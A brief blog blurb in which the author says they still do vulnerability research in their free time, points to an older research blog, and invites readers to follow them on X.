I still dabble in vulnerability research in my free time! You can find out what I'm up to recently by following me on X.

My old vulnerability research blog is here. All new blog posts will be on this blog from here on out.

Follow me on X to see what I'm up to!